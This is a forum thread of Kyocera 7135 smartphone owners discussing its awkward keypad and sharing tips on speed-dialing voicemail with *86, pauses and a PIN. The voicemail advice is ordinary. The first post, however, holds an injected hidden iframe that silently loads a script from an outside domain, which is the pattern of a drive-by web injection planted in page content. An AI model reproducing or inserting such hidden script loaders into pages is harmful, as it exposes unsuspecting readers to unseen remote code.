+ Reply to Thread

terrible numeric keypad

I love the 7135, except for only one thing: why in the world did they design the numeric keypad like that? Aren't all other numeric keypads straight? Why is the 8 below the 7? I often punch up the wrong number, especially when dialing voice mail codes.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You have a point, but...

Why are you dialing voicemail codes???

Instead program in: *86,,#[your voicemail code here]#1
    ~'kito
    pdaPhoneHome Moderator

many new phones have skewed number pads

skewed, screwed, whatever.

I do however wish that the buttons were raised a bit more and were more rubbery, like on the 6035, rather than the hard plastic. Why did they have to change those? I suppose so the clam could close.
    ~'kito
    pdaPhoneHome Moderator

Administrator
    more than likely the plastic was cheaper...

Originally posted by Markito
    You have a point, but...

I don't quite understand what you're typing in here. Is it so if I put my password on the speed dial. It wouldn't show up?

if so, what am I supposed to type in (everything) in order for it to work.

Originally posted by nl4jy
    I don't quite understand what you're typing in here. Is it so if I put my password on the speed dial. It wouldn't show up?

if so, what am I supposed to type in (everything) in order for it to work.
    it's so you don't have to "dial" voicemail everytime you'd like to check your messages. You can set up the "1" key to dial directly to VM. Click on the Messages button, then the menu settings icon(the little 'dropdown button on the bottom left of the graffitti), then tap "Voice Mail". Then where it says "voice mail number", put in *86, #, (your 4 digit pin),

*86 is verizon's "check voice mail" number

the comma (yes you have to put that in there) is a "pause" to let the phone answer

then your 4 digit pin, and another comma........ from there, you can check your messages, etc

it's helpful, that way you're only pressing "1" once, and you let the phone do the rest of the typing.

hope it helps

Thanks for the instructions on setting the #1 key to voicemail. Mine got accidentally erased and I tried to fix it through the speed-dial menu but it won't let you mess with the #1 key. I had to put it on the #2 key until now.

I also like having the phone do the # and the PIN since I'm used to Sprint's one key voicemail. Definately need two commas, for extra delay, after the *86 if you want to dial voicemail using the speakerphone.

I also trained it in voice dialing.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Thanks guys the quicker voicemail retrieval is great. I love it.

Back on topic.... I was with Markito when I first got my phone. The plastic numeric key pad is kind of difficult to use. However after many hours of use I've discovered that if they had raised the numbers, or made them easier to push then I'd constantly be interupting what I'm doing on the palm by mistakenly pushing a button. Bottom line, I think I like it this way.
    :awink
    If at first you don't succeed, don't try sky diving.

Yup, I also am in the camp of prefering the old keypad... but that might change after winter. I did not realize that with the 6035 I was able to still "feel" the buttons through my gloves and what a bonus that was.

I have to take them off for the 7135 because the size is so much more compact and the "feel" is not as strong.

I am also getting used to the Send and End buttons not being lit....

The send and end buttons are lit on mine, just very dim.

Originally posted by Markito
    You have a point, but...

Markito, why are you dialing *86?

If you have 1000 mobile to mobile (which comes with nights/weekends and bonus peak minutes all for like $5 on America's Choice--the plan I just bought), better to dial:

5551234567,PIN#,1

Replacing your own cell phone number with the "5551234567" part. That way you get up to a 1000 minutes of checking your voice mail free. This is useful because, according to the guy at the vzw store where I activated my phone, you get charged airtime for *86.

Whaddya think?

That's a good tip since I have that kind of plan. Thanks!

Me too-- I just looked at my bill and noticed a bunch of calls to myself.. But I always use *86 so does it really make a difference? When I get home I will look at it again to see if they were marked as M2M.
    iPhone therefore iAm.

Folks,

Another reason to program your phone number instead of *86 for voice mail is that *86 won't work in all non-Verizon markets, while calling your own number will.

Glenn

Good point Glenn-- I had this happen to me once when I was in an extended Verizon area.. (blinking RM). Definately a good reason. .....same theory applies for making sure all the address book phone entries have area codes!
    iPhone therefore iAm.

Originally posted by Steve
    Me too-- I just looked at my bill and noticed a bunch of calls to myself.. But I always use *86 so does it really make a difference? When I get home I will look at it again to see if they were marked as M2M.
    Unfortuanly Its not there or i just cant find it, but i dont see any Mobile 2 mobile indicators near entries on my statement with my number on them... I know they are *86 calls, but I don;t know if they are counting them as m2m.. i still suspect they are not.
    iPhone therefore iAm.

You guys are Sooooooo cool. I Love my gadgets and have had my 7135 for a month now. I have been skittish about "programming" anything and have used the 1 button and followed the prompts, etc. On my 6035, I dialed *86 and did the same. I am so technically challenge, I even had myself on a separate speed dial so I could get VM when out of service. Followed Markito's instructions and VIOLA! Thanks. Maybe I'll get "smarter" if I just keep reading these forums.

Originally posted by est8plannr
    You guys are Sooooooo cool. I Love my gadgets and have had my 7135 for a month now. I have been skittish about "programming" anything and have used the 1 button and followed the prompts, etc. On my 6035, I dialed *86 and did the same. I am so technically challenge, I even had myself on a separate speed dial so I could get VM when out of service. Followed Markito's instructions and VIOLA! Thanks. Maybe I'll get "smarter" if I just keep reading these forums.
    Thats the plan! Welcome to the SmartphoneSource! Be sure to post what you learn, however small or large, so others get smarter! This forum ROCKS! (If anybody agrees, please indicate this by clicking on the "paypal donate" button at the bottom of the page. thank you. ) hehe
    iPhone therefore iAm.